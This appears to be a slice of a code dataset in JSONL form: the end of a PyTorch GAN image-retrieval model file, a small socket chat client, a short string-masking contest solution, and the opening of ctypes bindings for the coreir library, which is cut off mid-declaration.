self.database_feature_c0[final_index][0]\n else:\n if self.use_two_stage:\n return path, self.database_feature_c1[final_index][1]\n else:\n return path, self.database_feature_c1[final_index][0]\n\n def test(self, index=0):\n with torch.no_grad():\n self.visuals = [self.real_A]\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n raw_encoded_finer = None\n if self.use_two_stage: raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA)\n if self.DA == 0:\n # building the feature database\n db_path = copy.deepcopy(self.image_paths[0])\n if db_path.split('/')[-1][11] == '0':\n self.database_feature_c0.append((raw_encoded, raw_encoded_finer))\n self.database_path_c0.append(db_path)\n else:\n self.database_feature_c1.append((raw_encoded, raw_encoded_finer))\n self.database_path_c1.append(db_path)\n return \"database\"\n else:\n path, retrieved_image = self.image_retrieval(raw_encoded, self.image_paths[0], raw_encoded_finer, index)\n return path\n\n def find_grad_sam(self, raw_encoded, query_path, retrieved_image, index, rank=-1):\n with torch.set_grad_enabled(True):\n new_raw_encoded = copy.deepcopy(raw_encoded.view(256, 64, 64)).cuda()\n new_raw_encoded.requires_grad_(True)\n new_retrieved_image = copy.deepcopy(retrieved_image.view(256, 64, 
64)).cuda()\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n mean_cos_similarity = mean_cos(new_raw_encoded.view(256, -1), new_retrieved_image.view(256, -1)).mean(0)\n mean_cos_similarity.backward()\n\n mask = F.relu(torch.mul(new_raw_encoded,\n new_raw_encoded.grad.sum(1).sum(1).view(256, 1, 1).expand([256, 64, 64])).sum(\n dim=0))\n # normalization\n mask -= mask.min()\n mask /= mask.max()\n mask = cv2.resize(mask.cpu().detach().numpy(), (256, 256))\n heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)\n heatmap = np.float32(heatmap) / 255\n heatmap = heatmap[..., ::-1] # gbr to rgb\n img = io.imread(query_path)\n img = np.float32(cv2.resize(img, (256, 256))) / 255\n\n sam = heatmap + np.float32(img)\n sam = norm_image(sam)\n heatmap = norm_image(heatmap)\n img = norm_image(img)\n if not os.path.exists(self.opt.sam_matched_dir):\n os.makedirs(self.opt.sam_matched_dir)\n if not os.path.exists(self.opt.sam_mismatched_dir):\n os.makedirs(self.opt.sam_mismatched_dir)\n if rank == -1:\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_sam' + '_' +\n query_path.split('/')[-1], sam)\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_heat' + '_' +\n query_path.split('/')[-1], heatmap)\n io.imsave(self.opt.sam_matched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_img' + '_' +\n query_path.split('/')[-1], img)\n\n else:\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_sam_' + str(\n rank) + '_' + query_path.split('/')[\n -1], sam)\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_heat_' + str(\n rank) + '_' + query_path.split('/')[\n -1], heatmap)\n io.imsave(self.opt.sam_mismatched_dir + self.opt.name + \"_\" + self.opt.name_finer + '_s' + str(\n self.opt.which_slice) + \"_top\" + str(self.opt.top_n) + \"_\" + str(index) + '_img_' + str(\n rank) + '_' + query_path.split('/')[\n -1], img)\n\n def find_sam_weight(self, query, db):\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n mean_cos_similarity = mean_cos(query.view(256, -1), db.view(256, -1)).mean(0)\n grad_map = torch.autograd.grad(mean_cos_similarity, query, create_graph=True)[0]\n weight = grad_map.sum(1).sum(1).view(256, 1, 1).expand([256, 64, 64])\n return weight\n\n def get_image_paths(self):\n return self.image_paths\n\n def save_features(self):\n with torch.no_grad():\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n\n encoded = raw_encoded.view(-1) # encoded_new1\n encoded_np = encoded.cpu().numpy()\n db_path = copy.deepcopy(self.image_paths[0])\n if not os.path.exists(\"./features/\" + db_path.split('/')[-3]):\n os.makedirs(\"./features/\" + db_path.split('/')[-3])\n print(\"./features/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4])\n np.savez(\"./features/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4], encoded_np, db_path)\n if self.use_two_stage:\n if not os.path.exists(\"./features_finer/\" + 
db_path.split('/')[-3]):\n os.makedirs(\"./features_finer/\" + db_path.split('/')[-3])\n raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA)\n np.savez(\"./features_finer/\" + db_path.split('/')[-3] + '/' + db_path.split('/')[-1][:-4],\n raw_encoded_finer.view(-1).cpu().numpy(),\n db_path)\n\n def find_query_features(self):\n with torch.no_grad():\n self.labels = ['query_image_%d' % self.DA]\n raw_encoded = self.netG.encode(self.real_A, self.DA)\n encoded = raw_encoded.view(-1) # encoded_new1\n\n # image = copy.deepcopy(self.real_A)\n qr_path = copy.deepcopy(self.image_paths[0])\n if self.use_two_stage:\n raw_encoded_finer = self.netG_finer.encode(self.real_A, self.DA).view(-1)\n else:\n raw_encoded_finer = None\n pair = (encoded, qr_path, raw_encoded_finer)\n # if len(list) % 1 == 0:\n self.query_feature_list.append(pair) # image and coder\n\n def find_dist_mat(self):\n cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n dist_mat = []\n if self.opt.only_for_finer:\n self.dirs = sorted(glob.glob(\"./features_finer/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n else:\n self.dirs = sorted(glob.glob(\"./features/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n for i, name in enumerate(self.dirs):\n print(i, name)\n feature_path = np.load(name)\n self.robotcar_database.append(torch.from_numpy(feature_path['arr_0']).view(256, 64, 64))\n dist_mat_row = []\n for j, query_feat in enumerate(self.query_feature_list):\n if self.opt.mean_cos:\n dist = 1 - mean_cos(query_feat[0].view(256, -1),\n torch.from_numpy(feature_path['arr_0']).cuda().view(256, -1)).mean()\n else:\n dist = 1 - cos(query_feat[0],\n torch.from_numpy(\n feature_path['arr_0']).cuda()) * 1 # + L2loss(query_encoded,item[1])*0\n dist_mat_row.append(dist.cpu().numpy().tolist())\n dist_mat.append(dist_mat_row)\n if self.opt.mean_cos:\n mean_cos = \"meancos\"\n else:\n mean_cos = \"plaincos\"\n if self.opt.meancos_finer:\n mean_cos_finer = \"meancosfiner\"\n else:\n mean_cos_finer = \"plaincosfiner\"\n np.savez(\n \"dist_mat_cos_\" + self.opt.dataroot.split('/')[3] + \"_env\" + str(self.opt.test_condition) + '_' + mean_cos\n + '_' + mean_cos_finer,\n np.array(dist_mat))\n self.dist_mat_torch = torch.from_numpy(np.array(dist_mat)).cuda()\n\n def load_dist_mat(self):\n if self.opt.mean_cos:\n mean_cos = \"meancos\"\n else:\n mean_cos = \"plaincos\"\n if self.opt.meancos_finer:\n mean_cos_finer = \"meancosfiner\"\n else:\n mean_cos_finer = \"plaincosfiner\"\n if self.opt.only_for_finer:\n self.dirs = sorted(glob.glob(\"./features_finer/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n else:\n self.dirs = sorted(glob.glob(\"./features/\" + self.opt.dataroot.split('/')[3] + \"/*\"))\n for i, name in enumerate(self.dirs):\n print(i, name)\n self.robotcar_database.append(torch.from_numpy(np.load(name)['arr_0']).view(256, 64, 64))\n self.dist_mat_torch = torch.from_numpy(\n np.load(\"dist_mat_cos_\" + self.opt.dataroot.split('/')[3] + \"_env\" + str(\n self.opt.test_condition) + '_' + mean_cos\n + '_' + mean_cos_finer + \".npz\")[\n 'arr_0']).cuda()\n\n def find_retrieval(self):\n query_path = []\n retrieved_path = []\n if self.use_two_stage:\n cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n _, least_dist_index_topN = torch.sort(self.dist_mat_torch, 0)\n least_dist_index_topN = least_dist_index_topN.transpose(0, 1)[:, :self.top_n]\n self.dirs_finer = sorted(glob.glob(\"./features_finer/\" + 
self.opt.dataroot.split('/')[3] + \"/*\"))\n for query_index, top_n_index in enumerate(least_dist_index_topN):\n query_feature = self.query_feature_list[query_index][2]\n least_value = 1000000\n path = None\n for _index in top_n_index:\n if self.opt.mean_cos:\n dist = 1 - mean_cos(query_feature.view(256, -1),\n torch.from_numpy(\n np.load(self.dirs_finer[_index.cpu().numpy()])['arr_0']).cuda().view(\n 256, -1)).mean()\n else:\n dist = 1 - cos(query_feature,\n torch.from_numpy(\n np.load(self.dirs_finer[_index.cpu().numpy()])['arr_0']).cuda()) * 1\n if dist < least_value:\n least_value = dist\n path = self.dirs_finer[_index.cpu().numpy()]\n retrieved_path.append(path)\n query_path.append(self.query_feature_list[query_index][1])\n print(\"query_path: \", query_path)\n print(\"retrieved_path: \", retrieved_path)\n else:\n if not self.opt.save_sam_visualization:\n least_dist_index = torch.argmin(self.dist_mat_torch, 0).cpu().numpy()\n for i in list(range(least_dist_index.size)):\n query_path.append(self.query_feature_list[i][1])\n retrieved_path.append(self.dirs[least_dist_index[i]])\n else:\n _, least_dist_index_topN = torch.sort(self.dist_mat_torch, 0)\n least_dist_index = least_dist_index_topN.transpose(0, 1)[:, :100].cpu().numpy()\n for i in list(range(least_dist_index.size)):\n query_path.append(self.query_feature_list[i][1])\n retrieved_path.append(self.dirs[least_dist_index[i][0]])\n if i % 10 == 0:\n self.find_grad_sam(self.query_feature_list[i][0], self.query_feature_list[i][1],\n self.robotcar_database[least_dist_index[i][0]], i)\n self.find_grad_sam(self.robotcar_database[least_dist_index[i][0]],\n self.opt.dataroot + \"test00/\" + self.dirs[least_dist_index[i][0]].split('/')[\n -1][\n :-4] + \".jpg\", self.query_feature_list[i][0],\n i)\n self.find_grad_sam(self.query_feature_list[i][0], self.query_feature_list[i][1],\n self.robotcar_database[least_dist_index[i][99]], i, 100)\n self.find_grad_sam(self.robotcar_database[least_dist_index[i][99]],\n self.opt.dataroot + \"test00/\" + self.dirs[least_dist_index[i][0]].split('/')[\n -1][\n :-4] + \".jpg\",\n self.query_feature_list[i][99], i,\n 100)\n\n print(\"query_path: \", query_path)\n print(\"retrieved_path: \", retrieved_path)\n return query_path, retrieved_path\n\n def backward_D_basic(self, real, fake, domain):\n # Real\n pred_real = self.netD.forward(real, domain)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = self.netD.forward(fake.detach(), domain)\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n # backward\n loss_D.backward()\n return loss_D\n\n def backward_D(self):\n # D_A\n fake_B = self.fake_pools[self.DB].query(self.fake_B)\n self.loss_D[self.DA] = self.backward_D_basic(self.real_B, fake_B, self.DB)\n # D_B\n fake_A = self.fake_pools[self.DA].query(self.fake_A)\n self.loss_D[self.DB] = self.backward_D_basic(self.real_A, fake_A, self.DA)\n\n def backward_G(self):\n encoded_A = self.netG.encode(self.real_A, self.DA)\n encoded_B = self.netG.encode(self.real_B, self.DB)\n\n # GAN loss\n # D_A(G_A(A))\n self.fake_B = self.netG.decode(encoded_A, self.DB)\n pred_fake = self.netD.forward(self.fake_B, self.DB)\n self.loss_G[self.DA] = self.criterionGAN(pred_fake, True)\n # D_B(G_B(B))\n self.fake_A = self.netG.decode(encoded_B, self.DA)\n pred_fake = self.netD.forward(self.fake_A, self.DA)\n self.loss_G[self.DB] = self.criterionGAN(pred_fake, True)\n # Forward cycle loss\n rec_encoded_A = self.netG.encode(self.fake_B, self.DB)\n 
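# Editor's note: forward cycle A -> fake_B -> rec_A; criterionCycle (SmoothL1)\n        # below enforces rec_A ~= real_A, and rec_encoded_A also feeds the\n        # feature-triplet terms computed further down.\n        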
self.rec_A = self.netG.decode(rec_encoded_A, self.DA)\n self.loss_cycle[self.DA] = self.criterionCycle(self.rec_A, self.real_A)\n # Backward cycle loss\n rec_encoded_B = self.netG.encode(self.fake_A, self.DA)\n self.rec_B = self.netG.decode(rec_encoded_B, self.DB)\n self.loss_cycle[self.DB] = self.criterionCycle(self.rec_B, self.real_B)\n\n if self.hard_negative:\n neg_B_features = self.netG.encode(self.neg_B, self.DB)\n\n if self.use_realAB_as_negative:\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(encoded_A.view(-1), neg_B.view(-1).detach()) for neg_B in neg_B_features])).item()\n dnA = self.L2loss(encoded_A.view(-1), neg_B_features[least_index].view(-1).detach())\n else:\n dnA = self.L2loss(encoded_A.view(-1), encoded_B.view(-1).detach())\n else:\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(rec_encoded_A.view(-1), neg_B.view(-1).detach()) for neg_B in neg_B_features])).item()\n dnA = self.L2loss(rec_encoded_A.view(-1), neg_B_features[least_index].view(-1).detach())\n else:\n dnA = self.L2loss(rec_encoded_A.view(-1), encoded_B.view(-1).detach())\n dpA = self.L2loss(rec_encoded_A.view(-1), encoded_A.view(\n -1).detach())\n\n if self.opt.mean_cos:\n cospA = 1 - self.mean_cos(rec_encoded_A.view(256, -1), encoded_A.view(256, -1)).mean(0)\n else:\n cospA = 1 - self.cos(rec_encoded_A.view(-1), encoded_A.view(-1))\n if self.lambda_triplet > 0:\n\n self.loss_triplet[self.DA] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dnA /\n (\n self.margin * torch.exp(\n self.adapt * (-dpA)) # dnA/dpA#s#self.margin\n + dpA))\n if self.hard_negative:\n self.loss_triplet[self.DA] = 2 * self.loss_triplet[self.DA]\n\n self.feature_distance[self.DA] = dpA\n self.feature_cos[self.DA] = cospA\n\n if not self.hard_negative:\n if self.use_realAB_as_negative:\n dnB = self.L2loss(encoded_B.view(-1), encoded_A.view(-1).detach())\n else:\n dnB = self.L2loss(rec_encoded_B.view(-1), encoded_A.view(-1).detach())\n dpB = self.L2loss(rec_encoded_B.view(-1), encoded_B.view(\n -1).detach())\n if self.opt.mean_cos:\n cospB = 1 - self.mean_cos(rec_encoded_B.view(256, -1), encoded_B.view(256, -1)).mean(0)\n else:\n cospB = 1 - self.cos(rec_encoded_B.view(-1), encoded_B.view(-1))\n if self.lambda_triplet > 0 and not self.hard_negative:\n self.loss_triplet[self.DB] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dnB / (self.margin * torch.exp(self.adapt * (-dpB)) + dpB))\n if self.hard_negative:\n self.loss_triplet[self.DB] = 0\n\n self.feature_distance[self.DB] = dpB\n self.feature_cos[self.DB] = cospB\n if self.lambda_latent > 0:\n if self.train_using_cos:\n loss_latent_A = cospA\n loss_latent_B = cospB\n if self.use_cos_latent_with_L2:\n loss_latent_A += dpA\n loss_latent_B += dpB\n else:\n loss_latent_A = dpA\n loss_latent_B = dpB\n else:\n loss_latent_A, loss_latent_B = 0, 0\n\n if self.lambda_sam > 0:\n self.loss_sam[self.DA] = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(encoded_A.view(256, 64, 64),\n rec_encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(rec_encoded_A.view(256, 64, 64),\n encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n self.loss_sam[self.DB] = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),\n rec_encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_B.view(256, 64, 64),\n self.find_sam_weight(rec_encoded_B.view(256, 
64, 64),\n encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n\n if self.lambda_sam_triplet > 0:\n dp_samA = self.loss_sam[self.DA].cuda()\n dp_samB = self.loss_sam[self.DB].cuda()\n if self.use_realAB_as_negative:\n if not self.hard_negative:\n dn_samA = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64, 64))).sum(dim=0)).view(-1), F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(\n encoded_B.view(256, 64, 64),\n encoded_A.view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(F.relu(torch.mul(neg_B.view(256, 64, 64),\n self.find_sam_weight(neg_B.view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n neg_B.view(256, 64,64))).sum(dim=0)).view(-1).detach()) for neg_B in neg_B_features])).item()\n dn_samB = self.L2loss(F.relu(torch.mul(neg_B_features[least_index].view(256, 64, 64),\n self.find_sam_weight(\n neg_B_features[least_index].view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n neg_B_features[least_index].view(256, 64,64))).sum(dim=0)).view(-1).detach())\n else:\n dn_samB = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n else:\n if not self.hard_negative:\n dn_samA = self.L2loss(F.relu(torch.mul(encoded_A.view(256, 64, 64),\n self.find_sam_weight(encoded_A.view(256, 64, 64),\n rec_encoded_B.view(256, 64,64))).sum(dim=0)).view(-1),\n\n F.relu(torch.mul(rec_encoded_B.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_B.view(256, 64, 64),\n encoded_A.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n if self.hard_negative:\n least_index = torch.argmin(torch.Tensor(\n [self.L2loss(F.relu(torch.mul(neg_B.view(256, 64, 64),\n self.find_sam_weight(neg_B.view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n neg_B.view(256, 64,64))).sum(dim=0)).view(-1).detach()) for neg_B in neg_B_features])).item()\n dn_samB = self.L2loss(F.relu(torch.mul(neg_B_features[least_index].view(256, 64, 64),\n self.find_sam_weight(\n neg_B_features[least_index].view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n neg_B_features[least_index].view(256, 64, 64))).sum(dim=0)).view(-1).detach())\n else:\n dn_samB = self.L2loss(F.relu(torch.mul(encoded_B.view(256, 64, 64),\n self.find_sam_weight(encoded_B.view(256, 64, 64),\n rec_encoded_A.view(256, 64,64))).sum(dim=0)).view(-1),\n F.relu(torch.mul(rec_encoded_A.view(256, 64, 64),\n self.find_sam_weight(\n rec_encoded_A.view(256, 64, 64),\n encoded_B.view(256, 64,64))).sum(dim=0)).view(-1).detach())\n if not self.hard_negative:\n dn_samA = dn_samA.cuda()\n self.loss_sam_triplet[self.DA] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dn_samA /\n (self.margin_sam_triplet * 
torch.exp(self.adapt_sam_triplet * (-dp_samA))\n + dp_samA))\n dn_samB = dn_samB.cuda()\n self.loss_sam_triplet[self.DB] = torch.max(torch.cuda.FloatTensor([0.0]),\n 1 - dn_samB /\n (self.margin_sam_triplet * torch.exp(self.adapt_sam_triplet * (-dp_samB)) + dp_samB))\n if self.hard_negative:\n self.loss_sam_triplet[self.DA] = 0\n self.loss_sam_triplet[self.DB] = 2 * self.loss_sam_triplet[self.DB]\n\n # combined loss\n\n loss_G = self.loss_G[self.DA] + self.loss_G[self.DB] + \\\n (self.loss_cycle[self.DA] + self.loss_cycle[self.DB]) * self.lambda_cyc + \\\n (self.loss_triplet[self.DA] + self.loss_triplet[self.DB]) * self.lambda_triplet + \\\n (self.loss_sam[self.DA] + self.loss_sam[self.DB]) * self.lambda_sam + \\\n (self.loss_sam_triplet[self.DA] + self.loss_sam_triplet[self.DB]) * self.lambda_sam_triplet + \\\n (loss_latent_A + loss_latent_B) * self.lambda_latent\n loss_G.backward()\n\n def optimize_parameters(self):\n # G_A and G_B\n self.netG.zero_grads(self.DA, self.DB)\n self.backward_G()\n self.netG.step_grads(self.DA, self.DB)\n # D_A and D_B\n self.netD.zero_grads(self.DA, self.DB)\n self.backward_D()\n self.netD.step_grads(self.DA, self.DB)\n\n def get_current_errors(self):\n extract = lambda l: [(i if type(i) is int or type(i) is float else i.item()) for i in l]\n D_losses, G_losses, cyc_losses, feat_losses, feat_dist, cos_dist, sam_losses, loss_sam_triplet = \\\n extract(self.loss_D), extract(self.loss_G), extract(self.loss_cycle), \\\n extract(self.loss_triplet), extract(self.feature_distance), extract(self.feature_cos), extract(self.loss_sam), extract(self.loss_sam_triplet)\n\n return OrderedDict(\n [('D', D_losses), ('G', G_losses), ('Cyc', cyc_losses), ('Feat', feat_losses), ('Feat_dist', feat_dist),\n ('Cosine_dist', cos_dist), ('SAM', list(map(lambda x: x * 100000000, sam_losses))),\n ('SAM_triplet_feat', loss_sam_triplet)])\n\n def get_current_visuals(self, testing=False):\n if not testing:\n self.visuals = [self.real_A, self.fake_B, self.rec_A, self.real_B, self.fake_A, self.rec_B]\n self.labels = ['real_A', 'fake_B', 'rec_A', 'real_B', 'fake_A', 'rec_B']\n images = [util().tensor2im(v.data) for v in self.visuals]\n return OrderedDict(zip(self.labels, images))\n\n def save(self, label):\n self.save_network(self.netG, 'G', label, self.gpu_ids)\n self.save_network(self.netD, 'D', label, self.gpu_ids)\n\n def get_domain(self):\n return self.DA\n\n def update_hyperparams(self, curr_iter):\n if curr_iter > self.opt.niter:\n decay_frac = (curr_iter - self.opt.niter) / self.opt.niter_decay\n new_lr = self.opt.lr * (1 - decay_frac)\n self.netG.update_lr(new_lr)\n self.netD.update_lr(new_lr)\n print('updated learning rate: %f' % new_lr)\n\n if self.opt.lambda_latent > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_latent = self.opt.lambda_latent * decay_frac\n print(\"latent: \", self.lambda_latent)\n\n if self.opt.lambda_triplet > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_triplet = self.opt.lambda_triplet * decay_frac\n print(\"triplet_feature: \", self.lambda_triplet)\n\n if self.opt.lambda_sam > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_sam = self.opt.lambda_sam * decay_frac\n print(\"SAM: \", self.lambda_sam)\n","sub_path":"models/disam_model.py","file_name":"disam_model.py","file_ext":"py","file_size_in_byte":44471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275268386","text":"from Socket import 
Socket\nfrom threading import Thread\nimport os\n\n\nclass Client(Socket):\n def __init__(self):\n super(Client, self).__init__()\n self.nickname = None\n self.status = 0\n self.mychannels = ['Channel1', 'Channel2', 'Channel3']\n\n def set_up(self):\n self.connect(('127.0.0.1', 1234))\n\n self.check_nickname()\n\n self.check_channel()\n\n listen_thread = Thread(target=self.listen_server)\n listen_thread.start()\n\n send_thread = Thread(target=self.send_data, args=(None, None, None,))\n send_thread.start()\n\n def listen_server(self, listened_socket=None):\n while True:\n input_nickname = self.recv(254)\n data = self.recv(254)\n\n if data.decode('utf-8') == '/quit':\n print('\\r', end='')\n os.system(\"cls\")\n\n self.check_channel()\n\n self.status = 0\n\n elif input_nickname.decode('utf-8') != self.nickname:\n print('\\r', end='')\n print(f'{input_nickname.decode(\"utf-8\")}: {data.decode(\"utf-8\")} \\n{self.nickname}: ', end='')\n\n def send_data(self, nickname, channel, data):\n while True:\n if self.status == 0:\n _input = input(self.nickname + ': ')\n self.send(_input.encode('utf-8'))\n if _input == '/quit':\n self.status = 1\n\n def check_nickname(self):\n while True:\n self.nickname = input('Enter your nickname: ')\n if len(self.nickname) > 3:\n self.send(self.nickname.encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'OK':\n break\n print('Error: such name already exists')\n else:\n print('Error: length of name < 3')\n\n def print_list_channels(self):\n print('Your Channels:')\n for channel in self.mychannels:\n print(' ' + channel)\n print('')\n\n def check_channel(self):\n\n self.print_list_channels()\n\n while True:\n\n _input = input('Enter channel: ')\n if len(_input) == 0:\n continue\n\n self.send(_input.encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'wrong channel':\n print('Error: nonexistent channel')\n\n elif status.decode('utf-8') == 'OK':\n print('KO')\n pass\n\n else:\n print(status.decode('utf-8'))\n self.send(input('Answer: ').encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'OK':\n self.mychannels.append(_input)\n\n if status.decode('utf-8') == 'OK':\n self.send('OK'.encode('utf-8'))\n\n os.system(\"cls\")\n\n message = self.recv(330000).decode('utf-8').split('|')\n\n for line in message:\n print(line)\n break\n\n\nif __name__ == '__main__':\n client = Client()\n client.set_up()\n","sub_path":"Baranov_Vladislav/Messenger/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162149542","text":"def main():\n N = int(input())\n S = list(input())\n K = int(input())\n\n k_str = S[K-1]\n for i in range(len(S)):\n if S[i] != k_str:\n S[i] = '*'\n\n print(''.join(S))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tenka1_beginner_2019/tenka1-b.py","file_name":"tenka1-b.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106448166","text":"from ctypes import cdll\nimport ctypes as ct\nimport platform\nimport os\nfrom coreir.lib import load_shared_lib, libcoreir_c\nfrom coreir.context import COREContext, COREContext_p, Context, COREMapKind, COREMapKind_STR2ARG_MAP, COREMapKind_STR2PARAM_MAP, COREMapKind_STR2ARG_MAP\nfrom coreir.module import COREModule, COREModule_p, COREModuleDef, COREModuleDef_p, ModuleDef, Module, \\\n COREDirectedInstance_p, COREDirectedConnection_p, 
COREDirectedModule_p\nfrom coreir.namespace import CORENamespace, CORENamespace_p\nfrom coreir.type import COREType, COREType_p, CoreIRType, Params, Args, COREArg, COREArg_p, Type\nfrom coreir.wireable import COREWireable_p\nfrom collections import namedtuple\n\nclass COREConnection(ct.Structure):\n pass\n\nCOREConnection_p = ct.POINTER(COREConnection)\n\nlibcoreir_c.CORENewMap.argtypes = [COREContext_p, ct.c_void_p, ct.c_void_p, ct.c_uint32, COREMapKind]\nlibcoreir_c.CORENewMap.restype = ct.c_void_p\n\nlibcoreir_c.CORENewContext.restype = COREContext_p\n\nlibcoreir_c.COREPrintErrors.argtypes = [COREContext_p]\n\nlibcoreir_c.COREAny.argtypes = [COREContext_p]\nlibcoreir_c.COREAny.restype = COREType_p\n\nlibcoreir_c.COREBitIn.argtypes = [COREContext_p]\nlibcoreir_c.COREBitIn.restype = COREType_p\n\nlibcoreir_c.COREBit.argtypes = [COREContext_p]\nlibcoreir_c.COREBit.restype = COREType_p\n\nlibcoreir_c.COREArray.argtypes = [COREContext_p, ct.c_uint32, COREType_p]\nlibcoreir_c.COREArray.restype = COREType_p\n\nlibcoreir_c.CORERecord.argtypes = [COREContext_p, ct.c_void_p]\nlibcoreir_c.CORERecord.restype = COREType_p\n\nlibcoreir_c.COREPrintType.argtypes = [COREType_p, ]\n\nlibcoreir_c.CORELoadModule.argtypes = [COREContext_p, ct.c_char_p, ct.POINTER(ct.c_bool)]\nlibcoreir_c.CORELoadModule.restype = COREModule_p\n\nlibcoreir_c.CORESaveModule.argtypes = [COREModule_p, ct.c_char_p, ct.POINTER(ct.c_bool)]\n\nlibcoreir_c.COREGetGlobal.argtypes = [COREContext_p]\nlibcoreir_c.COREGetGlobal.restype = CORENamespace_p\n\nlibcoreir_c.CORENewModule.argtypes = [CORENamespace_p, ct.c_char_p, COREType_p, ct.c_void_p]\nlibcoreir_c.CORENewModule.restype = COREModule_p\n\nlibcoreir_c.COREModuleSetDef.argtypes = [COREModule_p, COREModuleDef_p]\n\nlibcoreir_c.COREPrintModule.argtypes = [COREModule_p]\n\nlibcoreir_c.COREModuleNewDef.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleNewDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREModuleGetDef.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleGetDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREModuleDefAddModuleInstance.argtypes = [COREModuleDef_p, ct.c_char_p, COREModule_p, ct.c_void_p]\nlibcoreir_c.COREModuleDefAddModuleInstance.restype = 